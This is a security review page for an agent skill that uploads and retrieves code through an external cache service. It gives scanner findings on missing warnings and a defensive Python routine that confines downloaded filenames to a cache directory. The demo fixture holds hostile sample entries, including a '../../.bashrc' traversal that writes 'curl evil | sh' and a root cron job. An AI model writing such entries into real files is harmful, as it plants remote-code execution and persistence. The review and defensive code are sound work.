Code Cache

Security checks across malware telemetry and agentic risk

Overview

This appears to be a genuine code-cache integration, but it warrants review: it sends selected local code to a third-party service and writes code retrieved from that service into local files that may later be executed.

Install only if you are comfortable sending selected source files and task descriptions to Raysurfer and receiving code back from that service. If you do:
  • Use a dedicated API key for this skill rather than a shared or personal one.
  • Do not upload secrets or proprietary code unless that has been approved.
  • Review cached code before running it.
  • Run retrieved code in a constrained sandbox.
  • Avoid using the files command in sensitive directories until the skill validates the filenames and paths it writes.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (5)

Missing User Warnings

Severity: Medium
Confidence: 93%
Finding
The README explicitly promotes retrieving and executing code from prior executions via an external service, but provides no warning that cached code may be untrusted, stale, or malicious. In an agent context, encouraging direct execution of remotely sourced code materially increases the risk of arbitrary code execution, credential theft, filesystem access, and supply-chain compromise.

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The README describes downloading executable code into the sandbox and uploading successful executions, but does not warn that uploaded code may contain secrets, proprietary logic, personal data, or environment-specific information. This can lead to unintended data exfiltration to the external service and later redistribution of sensitive code to other users through the cache.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The skill encourages uploading code and task descriptions to the Raysurfer service, but the user-facing description does not clearly warn that potentially sensitive code, prompts, or execution artifacts are transmitted to an external API/cache. Because this skill is specifically designed to store and retrieve prior code executions, the context makes the omission more dangerous: agents may send proprietary source code, secrets embedded in files, or confidential task descriptions off-platform without informed consent.

Missing User Warnings

Severity: Medium
Confidence: 94%
Finding
The upload command reads arbitrary local files and sends their full contents to a remote Raysurfer API, but the CLI does not provide an explicit warning, confirmation step, or clear data-handling notice at the point of upload. In an agent-skill context, this is risky because agents may be directed to upload files automatically and users may not realize sensitive source code, secrets, or proprietary data are being exfiltrated to a third party.

Missing User Warnings

Severity: Medium
Confidence: 92%
Finding
The files command retrieves code from a remote service and writes it directly into local files under the chosen cache directory without validation, warning, or confirmation. In this skill's context, the downloaded content is executable code intended for reuse by agents, so silently materializing remote code locally increases the chance of planting malicious or unsafe code into a workspace and having it later reviewed or executed.
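The path validation this finding says is missing, as an added example that is not the skill's own code: server-supplied filenames are confined to the cache directory (absolute paths, drive letters, `..` segments, NUL bytes and symlink escapes are rejected), files are created without the execute bit and never overwrite an existing file, and a bad entry is skipped rather than aborting the batch. The entry shape `{"name", "content"}`, the function names and the cache layout are assumptions; the real Raysurfer response schema is not shown on this page.

```python
"""Guarded write of remotely retrieved cache entries into a local cache directory.

Added example; not the skill's code. Assumes (hypothetically) that the remote
service returns entries as dicts with "name" and "content" keys.
"""
import os
from pathlib import Path, PurePosixPath


class UnsafeEntry(ValueError):
    """Raised when a server-supplied name cannot be mapped safely into the cache."""


def safe_cache_path(cache_dir: str, remote_name: str) -> Path:
    """Map a server-supplied filename onto a path strictly inside cache_dir."""
    if "\x00" in remote_name:
        raise UnsafeEntry("NUL byte in name")
    # Treat backslashes as separators so Windows-style traversal is caught too.
    rel = PurePosixPath(remote_name.replace("\\", "/"))
    if rel.is_absolute() or not rel.parts:
        raise UnsafeEntry(f"absolute or empty name: {remote_name!r}")
    if any(part == ".." or ":" in part for part in rel.parts):
        raise UnsafeEntry(f"traversal or drive letter in name: {remote_name!r}")
    root = Path(cache_dir).resolve()
    target = (root / Path(*rel.parts)).resolve()
    # resolve() follows symlinks already on disk, so a planted link inside the
    # cache cannot redirect the write outside it.
    if target != root and root not in target.parents:
        raise UnsafeEntry(f"escapes cache root: {remote_name!r}")
    return target


def is_safe(cache_dir: str, remote_name: str) -> bool:
    """Boolean convenience wrapper around safe_cache_path."""
    try:
        safe_cache_path(cache_dir, remote_name)
        return True
    except UnsafeEntry:
        return False


def materialize(cache_dir: str, entries: list[dict]) -> list[Path]:
    """Write entries under cache_dir: mode 0600 (no execute bit), never overwrite,
    and skip unsafe names so one hostile entry cannot block the rest."""
    written: list[Path] = []
    for e in entries:
        try:
            target = safe_cache_path(cache_dir, e["name"])
        except UnsafeEntry as err:
            print(f"skipped: {err}")
            continue
        target.parent.mkdir(parents=True, exist_ok=True)
        # O_EXCL: refuse to clobber anything already in the workspace.
        fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "wb") as f:
            f.write(e["content"].encode())
        written.append(target)
    return written


def demo() -> tuple[list[str], int]:
    """Run materialize on constructed entries in a temp dir; return the relative
    names that were written and how many entries were skipped."""
    import tempfile
    entries = [  # constructed sample response
        {"name": "utils/helper.py", "content": "def add(a, b):\n    return a + b\n"},
        {"name": "../../.bashrc", "content": "curl evil | sh\n"},       # traversal
        {"name": "/etc/cron.d/job", "content": "* * * * * root id\n"},  # absolute
        {"name": "C:\\Windows\\x.py", "content": "pass\n"},             # drive letter
    ]
    with tempfile.TemporaryDirectory() as d:
        written = materialize(d, entries)
        root = Path(d).resolve()
        names = sorted(p.relative_to(root).as_posix() for p in written)
    return names, len(entries) - len(written)


if __name__ == "__main__":
    print(demo())
```

Confining the write is necessary but not sufficient: the file that lands in the cache is still untrusted code, which is why it is created non-executable and why the overview above asks for review and a sandbox before anything retrieved is run.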

VirusTotal

60/60 vendors flagged this skill as clean.
